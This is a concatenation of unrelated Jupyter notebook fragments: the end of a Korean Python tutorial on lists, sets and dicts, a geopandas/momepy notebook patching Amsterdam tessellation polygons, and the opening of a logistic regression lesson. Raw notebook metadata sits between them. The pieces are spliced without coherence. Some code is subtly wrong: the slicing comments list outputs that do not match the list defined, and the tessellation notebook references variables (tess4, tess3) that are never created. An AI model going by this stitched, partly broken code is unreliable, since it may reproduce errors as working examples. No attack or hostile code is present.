"temp_list = [\n ['김 책임', '남'],\n ['박 선임', '여'],\n ['이 수석', '남', 15],\n ['최 책임', '여']\n]",
"_____no_output_____"
]
],
[
[
"각 `list` 크기가 달라도 됩니다.\n\n`list` of `tuple`s 를 `list` of `list`s 로 쉽게 바꾸는 법?\n- Part 3 에서 다룹니다.",
"_____no_output_____"
],
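One possible answer to the question above (an editorial sketch; the original defers the topic to Part 3):

```python
list_of_tuples = [('a', 1), ('b', 2), ('c', 3)]

# Either a list comprehension ...
list_of_lists = [list(t) for t in list_of_tuples]

# ... or map + list
list_of_lists = list(map(list, list_of_tuples))
```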
[
"#### 동일한 값을 특정 개수만큼 초기화",
"_____no_output_____"
]
],
[
[
"temp_list = [0] * 10",
"_____no_output_____"
],
[
"temp_list",
"_____no_output_____"
]
],
[
[
"### 크기 확인",
"_____no_output_____"
]
],
[
[
"len(temp_list)",
"_____no_output_____"
]
],
[
[
"### 분배",
"_____no_output_____"
]
],
[
[
"fruits_list = ['orange', 'apple', 'banana']",
"_____no_output_____"
],
[
"fruit1, fruit2, fruit3 = fruits_list",
"_____no_output_____"
],
[
"print(fruit1)\nprint(fruit2)\nprint(fruit3)",
"_____no_output_____"
]
],
[
[
"### 추가",
"_____no_output_____"
]
],
[
[
"temp_list = []\n\ntemp_list.append('김 책임')\ntemp_list.append('이 수석')",
"_____no_output_____"
],
[
"temp_list",
"_____no_output_____"
]
],
[
[
"특정 위치에 추가",
"_____no_output_____"
]
],
[
[
"temp_list",
"_____no_output_____"
],
[
"temp_list.insert(1, '박 선임')",
"_____no_output_____"
],
[
"temp_list",
"_____no_output_____"
]
],
[
[
"### 삭제\n- ~~전 별로 안 씀~~",
"_____no_output_____"
],
[
"`remove(x)`는 `list`에서 첫 번째로 나오는 x를 삭제",
"_____no_output_____"
]
],
[
[
"l = ['a', 'b', 'c', 'd', 'b']\n\nl.remove('b')",
"_____no_output_____"
],
[
"l",
"_____no_output_____"
]
],
[
[
"한 번에 `b`를 다 지우는 방법은?\n- Part 3 에서 해봅시다.",
"_____no_output_____"
],
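One possible answer to the question above (an editorial sketch; the original postpones it to Part 3): keep everything that is not `'b'`.

```python
l = ['a', 'b', 'c', 'd', 'b']

l = [x for x in l if x != 'b']   # ['a', 'c', 'd']
```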
[
"### 특정 값 접근(Access) & 변경\n- 그냥 Array 라고 생각하면 편합니다.\n - Index는 0부터 시작",
"_____no_output_____"
]
],
[
[
"nums = [1, 2, 3, 4, 5]",
"_____no_output_____"
],
[
"nums[2] = 6",
"_____no_output_____"
],
[
"nums",
"_____no_output_____"
]
],
[
[
"#### slicing",
"_____no_output_____"
]
],
[
[
"nums = [1, 2, 3, 4, 5] # range는 파이썬에 구현되어 있는 함수이며 정수들로 구성된 리스트를 만듭니다\nprint(nums) # 출력 \"[0, 1, 2, 3, 4]\"\nprint(nums[2:4]) # 인덱스 2에서 4(제외)까지 슬라이싱; 출력 \"[2, 3]\"\nprint(nums[2:]) # 인덱스 2에서 끝까지 슬라이싱; 출력 \"[2, 3, 4]\"\nprint(nums[:2]) # 처음부터 인덱스 2(제외)까지 슬라이싱; 출력 \"[0, 1]\"\nprint(nums[:]) # 전체 리스트 슬라이싱; 출력 [\"0, 1, 2, 3, 4]\"\nprint(nums[:-1]) # 슬라이싱 인덱스는 음수도 가능; 출력 [\"0, 1, 2, 3]\"\nnums[2:4] = [8, 9] # 슬라이스된 리스트에 새로운 리스트 할당\nprint(nums) # 출력 \"[0, 1, 8, 9, 4]\"",
"_____no_output_____"
]
],
[
[
"#### Slicing & Changing",
"_____no_output_____"
]
],
[
[
"nums = [1, 2, 3, 4, 5]",
"_____no_output_____"
],
[
"nums[1:3] = [6, 7]",
"_____no_output_____"
],
[
"nums",
"_____no_output_____"
]
],
[
[
"### 기타 등등: 뒤집기, ...",
"_____no_output_____"
]
],
[
[
"nums = [1, 2, 3, 4, 5]",
"_____no_output_____"
],
[
"nums[::-1]",
"_____no_output_____"
]
],
[
[
"홀수 index 만 순방향으로 access",
"_____no_output_____"
]
],
[
[
"nums[::2]",
"_____no_output_____"
]
],
[
[
"역방향으로 홀수 index만 access",
"_____no_output_____"
]
],
[
[
"nums[::-2]",
"_____no_output_____"
]
],
[
[
"### 정렬\n- `sorted` 라는 내장 함수 사용\n- `.sort()` → inplace",
"_____no_output_____"
]
],
[
[
"temp_list = [3, 2, 5, 8, 1, 7]",
"_____no_output_____"
],
[
"sorted(temp_list)",
"_____no_output_____"
],
[
"sorted(temp_list, reverse = True)",
"_____no_output_____"
]
],
[
[
"### 특정 값 존재 여부",
"_____no_output_____"
]
],
[
[
"temp_list = ['김 책임', '박 선임', '이 수석']",
"_____no_output_____"
],
[
"'김 책임' in temp_list",
"_____no_output_____"
],
[
"'이 선임' in temp_list",
"_____no_output_____"
]
],
[
[
"### `list` ↔ `tuple`",
"_____no_output_____"
]
],
[
[
"temp_list = [1, 2, 3, 4, 5]",
"_____no_output_____"
],
[
"tuple(temp_list)",
"_____no_output_____"
],
[
"type(tuple(temp_list))",
"_____no_output_____"
]
],
[
[
"### `str` & `list`",
"_____no_output_____"
],
[
"#### `split()`: 문자열 분리(tokenization)",
"_____no_output_____"
]
],
[
[
"multi_line_str = '''\n\n이름: 김영호\n직급: 책임컨설턴트\n소속: 데이터분석그룹\n\n'''\nprint(multi_line_str)",
"_____no_output_____"
],
[
"multi_line_str",
"_____no_output_____"
],
[
"multi_line_str.strip()",
"_____no_output_____"
],
[
"multi_line_str.strip().split('\\n')",
"_____no_output_____"
]
],
[
[
"#### `str` 쪼개기",
"_____no_output_____"
]
],
[
[
"tokens = multi_line_str.strip().split('\\n')",
"_____no_output_____"
],
[
"tokens",
"_____no_output_____"
]
],
[
[
"#### 여러 `str` 합치기",
"_____no_output_____"
]
],
[
[
"'\\n'.join(tokens)",
"_____no_output_____"
]
],
[
[
"### 여러 `list` 합치기",
"_____no_output_____"
]
],
[
[
"l1 = [1, 2, 3, 4, 5]\nl2 = ['a', 'b', 'c']\nl3 = ['*', '!', '%', '$']",
"_____no_output_____"
],
[
"# BETTER (Python 2.7+)\n[*l1, *l2, *l3]",
"_____no_output_____"
],
[
"# For (Python 2.6-)\nl = []\n\nl.extend(l1)\nl.extend(l2)\nl.extend(l3)",
"_____no_output_____"
],
[
"l",
"_____no_output_____"
]
],
[
[
"## `set`\n- 용도: 중복 제거",
"_____no_output_____"
],
[
"### 초기화",
"_____no_output_____"
]
],
[
[
"temp_set = set()",
"_____no_output_____"
],
[
"type(temp_set)",
"_____no_output_____"
]
],
[
[
"`tuple`을 넣어서 초기화 할 수도 있습니다.",
"_____no_output_____"
]
],
[
[
"temp_set = set((1, 2, 1, 3))",
"_____no_output_____"
],
[
"temp_set",
"_____no_output_____"
]
],
[
[
"중복이 제거된 것에 주목하세요. `{`와 `}` 사이에 값은 `,`로 구분되어 표시됩니다.",
"_____no_output_____"
],
[
"`list`도 넣어서 초기화 할 수 있습니다.",
"_____no_output_____"
]
],
[
[
"temp_set = set([1, 2, 1, 3])",
"_____no_output_____"
]
],
[
[
"아래와 같이 초기화 할 수도 있습니다.",
"_____no_output_____"
]
],
[
[
"temp_set = {1, 2, 1, 3}",
"_____no_output_____"
],
[
"type(temp_set)",
"_____no_output_____"
]
],
[
[
"### 크기 확인",
"_____no_output_____"
]
],
[
[
"len(temp_set)",
"_____no_output_____"
]
],
[
[
"### 추가",
"_____no_output_____"
]
],
[
[
"temp_set = set([1, 2])",
"_____no_output_____"
],
[
"temp_set.add(1)",
"_____no_output_____"
],
[
"temp_set",
"_____no_output_____"
]
],
[
[
"여러개의 값 한번에 추가하기",
"_____no_output_____"
]
],
[
[
"temp_set.update([2, 3, 4])",
"_____no_output_____"
],
[
"temp_set",
"_____no_output_____"
]
],
[
[
"### 삭제",
"_____no_output_____"
]
],
[
[
"temp_set = set([1, 2, 3])",
"_____no_output_____"
],
[
"temp_set.remove(2)",
"_____no_output_____"
],
[
"temp_set",
"_____no_output_____"
]
],
[
[
"### 특정 값 접근\n- Random access 안 됨",
"_____no_output_____"
],
[
"### 특정 값 존재 여부",
"_____no_output_____"
]
],
[
[
"temp_set = set(['김 책임', '박 선임', '이 수석'])",
"_____no_output_____"
],
[
"'김 책임' in temp_set",
"_____no_output_____"
],
[
"'김 책임님' in temp_set",
"_____no_output_____"
]
],
[
[
"### 연산\n- 참조: https://github.com/brennerm/PyTricks/blob/master/setoperators.py",
"_____no_output_____"
],
[
"#### 합집합: Union",
"_____no_output_____"
]
],
[
[
"food_set1 = {'짬뽕', '파스타', '쌀국수'}\nfood_set2 = {'짬뽕', '탕수육', '볶음밥'}",
"_____no_output_____"
],
[
"food_set1.union(food_set2)",
"_____no_output_____"
]
],
[
[
"#### 교집합: Intersection",
"_____no_output_____"
]
],
[
[
"food_set1.intersection(food_set2)",
"_____no_output_____"
]
],
[
[
"#### 차집합: Difference",
"_____no_output_____"
]
],
[
[
"food_set1.difference(food_set2)",
"_____no_output_____"
]
],
[
[
"비교해서 겹치는 것을 제외합니다.",
"_____no_output_____"
],
[
"### `list` ↔ `set`\n- `list` 안에 immutable object 들만 있을 때 가능",
"_____no_output_____"
],
[
"## `dict`\n- 이것도 정말 많이 쓰는 핵심적인 자료 구조\n- **`key`와 `value`의 쌍들**이 들어감\n - `key`\n - immutable 만 가능\n - 중복 불가\n - `value`\n - mutable 도 가능",
"_____no_output_____"
],
[
"### 초기화",
"_____no_output_____"
]
],
[
[
"temp_dict = {}",
"_____no_output_____"
],
[
"type(temp_dict)",
"_____no_output_____"
],
[
"temp_dict = {\n '이름' : '김영호',\n '사업부' : 'IT혁신사업부', \n '소속' : '데이터분석그룹'\n}",
"_____no_output_____"
]
],
[
[
"### 크기 확인",
"_____no_output_____"
]
],
[
[
"len(temp_dict)",
"_____no_output_____"
]
],
[
[
"### 추가",
"_____no_output_____"
]
],
[
[
"temp_dict = {}\n\ntemp_dict['근속연차'] = 3",
"_____no_output_____"
],
[
"temp_dict['근속연차'] += 1",
"_____no_output_____"
],
[
"temp_dict['근속연차']",
"_____no_output_____"
],
[
"temp_dict['좋아하는 음식'] = set()",
"_____no_output_____"
],
[
"temp_dict['좋아하는 음식']",
"_____no_output_____"
],
[
"temp_dict['좋아하는 음식'].add('짬뽕')\ntemp_dict['좋아하는 음식'].add('파스타')\ntemp_dict['좋아하는 음식'].add('쌀국수')",
"_____no_output_____"
],
[
"temp_dict['좋아하는 음식']",
"_____no_output_____"
]
],
[
[
"Key 가 없을 때 `dict`를 효율적으로 다루는 방법\n- Standard Library 시간에 다룹니다.",
"_____no_output_____"
],
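A quick preview of what the Standard Library session is hinting at (an editorial sketch; the keys used here are made-up examples): `collections.defaultdict` and `dict.setdefault` avoid explicit existence checks when a key may be missing.

```python
from collections import defaultdict

likes = defaultdict(set)        # a missing key starts out as an empty set
likes['kim'].add('jjamppong')   # no KeyError even though the key is new

plain = {}
plain.setdefault('kim', set()).add('jjamppong')   # same idea with a plain dict
```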
[
"### 삭제\n- ~~삭제는 별로 안 씀~~",
"_____no_output_____"
],
[
"### 특정 Key 접근",
"_____no_output_____"
]
],
[
[
"temp_dict = {\n '김 책임' : '남',\n '박 선임' : '여',\n '이 수석' : '남',\n '최 책임' : '여'\n}",
"_____no_output_____"
],
[
"temp_dict['김 책임']",
"_____no_output_____"
]
],
[
[
"Key 가 없을 떄?",
"_____no_output_____"
]
],
[
[
"temp_dict['양 책임']",
"_____no_output_____"
]
],
[
[
"에러 납니다.\n\n오류/예외 처리는?",
"_____no_output_____"
]
],
[
[
"temp_dict.get('양 책임')",
"_____no_output_____"
],
[
"temp_dict.get('양 책임', '키 없음')",
"_____no_output_____"
]
],
[
[
"### 특정 `key` 존재 여부",
"_____no_output_____"
]
],
[
[
"temp_dict = {\n '김 책임' : '남',\n '박 선임' : '여',\n '이 수석' : '남',\n '최 책임' : '여'\n}",
"_____no_output_____"
],
[
"'김 책임' in temp_dict",
"_____no_output_____"
]
],
[
[
"### `list` of `tuple`s → `dict`",
"_____no_output_____"
]
],
[
[
"list_of_tuples = [ \n ('김 책임', 'M+'),\n ('박 선임', 'M'),\n ('이 수석', 'E')\n]",
"_____no_output_____"
],
[
"d1 = dict(list_of_tuples)",
"_____no_output_____"
],
[
"d1",
"_____no_output_____"
],
[
"l1 = ['김 책임', '박 선임', '이 수석']\nl2 = ['M+', 'M', 'E']\n\nd2 = dict(zip(l1, l2))",
"_____no_output_____"
],
[
"d2",
"_____no_output_____"
],
[
"d1 == d2",
"_____no_output_____"
]
],
[
[
"### 여러 `dict` 합치기",
"_____no_output_____"
]
],
[
[
"d1 = {\n '김선임' : 'M+',\n '박선임' : 'M',\n '이수석' : 'E'\n}\n\nd2 = {\n 'Apple' : 'Red',\n 'Banana' : 'Yellow'\n}\n\nd3 = {\n 'ABC' : 'DEF',\n 'GHI' : 'JKL'\n}",
"_____no_output_____"
],
[
"d = {**d1, **d2, **d3}",
"_____no_output_____"
],
[
"d",
"_____no_output_____"
]
],
[
[
"### More on string formatting",
"_____no_output_____"
]
],
[
[
"temp_dict = {\n 'name' : '김영호',\n 'affiliation' : '삼성SDS', \n}\n\n\nformatted_string = '''\n이름: {name}\n소속: {affiliation}\n'''.format(**temp_dict)",
"_____no_output_____"
],
[
"formatted_string",
"_____no_output_____"
]
],
[
[
"Part 2 끝",
"_____no_output_____"
],
[
"참조\n- https://docs.python.org/ko/3/contents.html\n - https://docs.python.org/ko/3/tutorial/index.html\n- https://docs.python.org/3.7/howto/\n- http://cs231n.github.io/python-numpy-tutorial/\n- [점프 투 파이썬](https://wikidocs.net/book/1)\n - https://docs.python-guide.org/",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb2b4d5af339c69a77f912d4cad9f3ed9ed1abb6 | 113,420 | ipynb | Jupyter Notebook | code_production/Amsterdam/200225_fix_tessellation.ipynb | martinfleis/numerical-taxonomy-paper | bd4880bcce1f662798f60f84ddb7bc654f2bd4fe | [
"CC-BY-4.0"
] | 10 | 2021-05-09T10:44:45.000Z | 2022-01-19T07:06:07.000Z | code_production/Amsterdam/200225_fix_tessellation.ipynb | martinfleis/numerical-taxonomy-paper | bd4880bcce1f662798f60f84ddb7bc654f2bd4fe | [
"CC-BY-4.0"
] | null | null | null | code_production/Amsterdam/200225_fix_tessellation.ipynb | martinfleis/numerical-taxonomy-paper | bd4880bcce1f662798f60f84ddb7bc654f2bd4fe | [
"CC-BY-4.0"
] | null | null | null | 99.230096 | 22,212 | 0.824687 | [
[
[
"import geopandas as gpd\nimport momepy as mm\nimport fiona",
"_____no_output_____"
],
[
"path = '/Users/martin/Dropbox/Academia/Data/Geo/Amsterdam/fix.gpkg'",
"_____no_output_____"
],
[
"layers = fiona.listlayers(path)",
"_____no_output_____"
],
[
"layers",
"_____no_output_____"
],
[
"gdf = gpd.read_file(path, layer=layers[1])",
"_____no_output_____"
],
[
"limit = mm.buffered_limit(gdf)",
"_____no_output_____"
],
[
"tess = mm.Tessellation(gdf, 'uID', limit)",
"100%|██████████| 32/32 [00:00<00:00, 219.77it/s]"
],
[
"tess5 = tess.tessellation",
"_____no_output_____"
],
[
"tess5.plot()",
"_____no_output_____"
],
[
"keep1 = [163866, 163868, 163930, 163893, 150900, 150901, 150903, 150907, 150623]\ndelete1 = keep1",
"_____no_output_____"
],
[
"tess_fix4 = tess4.loc[tess4.uID.isin(keep1)]",
"_____no_output_____"
],
[
"tess_fix4.plot()",
"_____no_output_____"
],
[
"keep2 = [19440, 19433, 19449, 19450, 19451, 19452, 19453, 19448, 19446, 19445, 19454, 19438, 19437, 19436, 19435, 19434, 19444, 19443, 19442,\n 19457, 19455, 19359, 19352]\ndelete2 = keep2",
"_____no_output_____"
],
[
"tess_fix5 = tess5.loc[tess5.uID.isin(keep2)]",
"_____no_output_____"
],
[
"tess_fix5.plot()",
"_____no_output_____"
],
[
"keep3 = [171553, 171643, 171554]",
"_____no_output_____"
],
[
"tess_fix3 = tess3.loc[tess3.uID.isin(keep3)]",
"_____no_output_____"
],
[
"tess_fix3.plot()",
"_____no_output_____"
],
[
"fix = tess_fix4.append(tess_fix5)",
"_____no_output_____"
],
[
"fix",
"_____no_output_____"
],
[
"delete = keep1 + keep2",
"_____no_output_____"
],
[
"delete",
"_____no_output_____"
],
[
"tessellation = gpd.read_file('/Users/martin/Dropbox/Academia/Data/Geo/Amsterdam/queen.gpkg')",
"_____no_output_____"
],
[
"tessellation.shape",
"_____no_output_____"
],
[
"tessellation = tessellation.loc[~tessellation.uID.isin(delete)]",
"_____no_output_____"
],
[
"tessellation.shape",
"_____no_output_____"
],
[
"tessellation = tessellation.append(fix)",
"_____no_output_____"
],
[
"tessellation.shape",
"_____no_output_____"
],
[
"#Check in QGIS and fix invalid using buffer",
"_____no_output_____"
],
[
"validity = tessellation.is_valid",
"_____no_output_____"
],
[
"invalid = tessellation[~validity]",
"_____no_output_____"
],
[
"invalid",
"_____no_output_____"
],
[
"for ix, r in invalid.iterrows():\n g = r.geometry.buffer(0)\n tessellation.loc[ix]['geometry'] = g",
"<ipython-input-43-c1850b5b675a>:3: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n tessellation.loc[ix]['geometry'] = g\n"
],
[
"tessellation[~validity].is_valid",
"_____no_output_____"
],
[
"from shapely.wkt import loads",
"_____no_output_____"
],
[
"buf = invalid.geometry.apply(lambda x: x.buffer(0))",
"_____no_output_____"
],
[
"buf",
"_____no_output_____"
],
[
"tessellation.loc[buf.index, 'geometry'] = buf",
"_____no_output_____"
],
[
"tessellation",
"_____no_output_____"
],
[
"tessellation[['uID', 'geometry']].to_file('/Users/martin/Dropbox/Academia/Data/Geo/Amsterdam/queen.gpkg', layer='tessellation', driver='GPKG')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b58b1c952517ddb870c8d03626e762b0fc00e | 58,493 | ipynb | Jupyter Notebook | C3.Classification_LogReg/RegresionLogistica_student.ipynb | naxvm/ML4all | 8a604560362e12e78fd4698a3109b81ae426d9b2 | [
"MIT"
] | null | null | null | C3.Classification_LogReg/RegresionLogistica_student.ipynb | naxvm/ML4all | 8a604560362e12e78fd4698a3109b81ae426d9b2 | [
"MIT"
] | null | null | null | C3.Classification_LogReg/RegresionLogistica_student.ipynb | naxvm/ML4all | 8a604560362e12e78fd4698a3109b81ae426d9b2 | [
"MIT"
] | null | null | null | 34.672792 | 517 | 0.534885 | [
[
[
"# Logistic Regression\n\n Notebook version: 2.0 (Nov 21, 2017)\n 2.1 (Oct 19, 2018)\n\n Author: Jesús Cid Sueiro ([email protected])\n Jerónimo Arenas García ([email protected])\n\n Changes: v.1.0 - First version\n v.1.1 - Typo correction. Prepared for slide presentation\n v.2.0 - Prepared for Python 3.0 (backcompmatible with 2.7)\n Assumptions for regression model modified\n v.2.1 - Minor changes regarding notation and assumptions",
"_____no_output_____"
]
],
[
[
"from __future__ import print_function\n# To visualize plots in the notebook\n%matplotlib inline\n\n# Imported libraries\nimport csv\nimport random\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pylab\n\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import linear_model\n",
"_____no_output_____"
]
],
[
[
"# Logistic Regression\n\n## 1. Introduction\n\n### 1.1. Binary classification and decision theory. The MAP criterion\n\nThe goal of a classification problem is to assign a *class* or *category* to every *instance* or *observation* of a data collection. Here, we will assume that every instance ${\\bf x}$ is an $N$-dimensional vector in $\\mathbb{R}^N$, and that the class $y$ of sample ${\\bf x}$ is an element of a binary set ${\\mathcal Y} = \\{0, 1\\}$. The goal of a classifier is to predict the true value of $y$ after observing ${\\bf x}$.\n\nWe will denote as $\\hat{y}$ the classifier output or *decision*. If $y=\\hat{y}$, the decision is a *hit*, otherwise $y\\neq \\hat{y}$ and the decision is an *error*.\n",
"_____no_output_____"
],
[
"\nDecision theory provides a solution to the classification problem in situations where the relation between instance ${\\bf x}$ and its class $y$ is given by a known probabilistic model: assume that every tuple $({\\bf x}, y)$ is an outcome of a random vector $({\\bf X}, Y)$ with joint distribution $p_{{\\bf X},Y}({\\bf x}, y)$. A natural criteria for classification is to select predictor $\\hat{Y}=f({\\bf x})$ in such a way that the probability or error, $P\\{\\hat{Y} \\neq Y\\}$ is minimum. Noting that\n\n$$\nP\\{\\hat{Y} \\neq Y\\} = \\int P\\{\\hat{Y} \\neq Y | {\\bf x}\\} p_{\\bf X}({\\bf x}) d{\\bf x}\n$$\n\nthe optimal decision is got if, for every sample ${\\bf x}$, we make decision minimizing the conditional error probability:\n\n\\begin{align}\n\\hat{y}^* &= \\arg\\min_{\\hat{y}} P\\{\\hat{y} \\neq Y |{\\bf x}\\} \\\\\n &= \\arg\\max_{\\hat{y}} P\\{\\hat{y} = Y |{\\bf x}\\} \\\\\n\\end{align}",
"_____no_output_____"
],
[
"\nThus, the optimal decision rule can be expressed as\n\n$$\nP_{Y|{\\bf X}}(1|{\\bf x}) \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0}\\quad P_{Y|{\\bf X}}(0|{\\bf x}) \n$$\n\nor, equivalently\n\n$$\nP_{Y|{\\bf X}}(1|{\\bf x}) \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0}\\quad \\frac{1}{2} \n$$\n\nThe classifier implementing this decision rule is usually referred to as the MAP (*Maximum A Posteriori*) classifier. As we have seen, the MAP classifier minimizes the error probability for binary classification, but the result can also be generalized to multiclass classification problems.",
"_____no_output_____"
],
[
"### 1.2. Parametric classification.\n\nClassical decision theory is grounded on the assumption that the probabilistic model relating the observed sample ${\\bf X}$ and the true hypothesis $Y$ is known. Unfortunately, this is unrealistic in many applications, where the only available information to construct the classifier is a dataset $\\mathcal D = \\{{\\bf x}^{(k)}, y^{(k)}\\}_{k=0}^{K-1}$ of instances and their respective class labels.\n\nA more realistic formulation of the classification problem is the following: given a dataset $\\mathcal D = \\{({\\bf x}^{(k)}, y^{(k)}) \\in {\\mathbb{R}}^N \\times {\\mathcal Y}, \\, k=0,\\ldots,{K-1}\\}$ of independent and identically distributed (i.i.d.) samples from an ***unknown*** distribution $p_{{\\bf X},Y}({\\bf x}, y)$, predict the class $y$ of a new sample ${\\bf x}$ with the minimum probability of error.\n",
"_____no_output_____"
],
[
"\nSince the probabilistic model generating the data is unknown, the MAP decision rule cannot be applied. However, many classification algorithms use the dataset to obtain an estimate of the posterior class probabilities, and apply it to implement an approximation to the MAP decision maker.\n\nParametric classifiers based on this idea assume, additionally, that the posterior class probabilty satisfies some parametric formula:\n\n$$\nP_{Y|X}(1|{\\bf x},{\\bf w}) = f_{\\bf w}({\\bf x})\n$$\n\nwhere ${\\bf w}$ is a vector of parameters. Given the expression of the MAP decision maker, classification consists in comparing the value of $f_{\\bf w}({\\bf x})$ with the threshold $\\frac{1}{2}$, and each parameter vector would be associated to a different decision maker.\n",
"_____no_output_____"
],
[
"In practice, the dataset ${\\mathcal D}$ is used to select a particular parameter vector $\\hat{\\bf w}$ according to certain criterion. Accordingly, the decision rule becomes\n\n$$\nf_{\\hat{\\bf w}}({\\bf x}) \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0}\\quad \\frac{1}{2} \n$$\n\n\nIn this lesson, we explore one of the most popular model-based parametric classification methods: **logistic regression**.\n\n<img src=\"./figs/parametric_decision.png\" width=400>\n",
"_____no_output_____"
],
[
"## 2. Logistic regression.\n\n### 2.1. The logistic function\n\nThe logistic regression model assumes that the binary class label $Y \\in \\{0,1\\}$ of observation $X\\in \\mathbb{R}^N$ satisfies the expression.\n\n$$P_{Y|{\\bf X}}(1|{\\bf x}, {\\bf w}) = g({\\bf w}^\\intercal{\\bf x})$$\n$$P_{Y|{\\bf,X}}(0|{\\bf x}, {\\bf w}) = 1-g({\\bf w}^\\intercal{\\bf x})$$\n\nwhere ${\\bf w}$ is a parameter vector and $g(·)$ is the *logistic* function, which is defined by\n\n$$g(t) = \\frac{1}{1+\\exp(-t)}$$\n",
"_____no_output_____"
],
[
"It is straightforward to see that the logistic function has the following properties:\n\n- **P1**: Probabilistic output: $\\quad 0 \\le g(t) \\le 1$\n- **P2**: Symmetry: $\\quad g(-t) = 1-g(t)$\n- **P3**: Monotonicity: $\\quad g'(t) = g(t)·[1-g(t)] \\ge 0$\n\nIn the following we define a logistic function in python, and use it to plot a graphical representation.",
"_____no_output_____"
],
[
"**Exercise 1**: Verify properties P2 and P3.\n\n**Exercise 2**: Implement a function to compute the logistic function, and use it to plot such function in the inverval $[-6,6]$.",
"_____no_output_____"
]
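A short worked verification of P2 and P3 (added as a hint; it is not part of the original exercise statement):

$$g(-t) = \frac{1}{1+e^{t}} = \frac{e^{-t}}{1+e^{-t}} = 1 - \frac{1}{1+e^{-t}} = 1 - g(t)$$

$$g'(t) = \frac{e^{-t}}{\left(1+e^{-t}\right)^2} = \frac{1}{1+e^{-t}}\cdot\frac{e^{-t}}{1+e^{-t}} = g(t)\,[1-g(t)] \ge 0$$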
],
[
[
"# Define the logistic function\ndef logistic(t):\n #<SOL>\n #</SOL>\n\n# Plot the logistic function\nt = np.arange(-6, 6, 0.1)\nz = logistic(t)\n\nplt.plot(t, z)\nplt.xlabel('$t$', fontsize=14)\nplt.ylabel('$g(t)$', fontsize=14)\nplt.title('The logistic function')\nplt.grid()",
"_____no_output_____"
]
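One possible way to fill in the `<SOL>` block above (a sketch; since this is the student version of the notebook, the official solution is intentionally left out):

```python
def logistic(t):
    return 1.0 / (1.0 + np.exp(-t))
```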
],
[
[
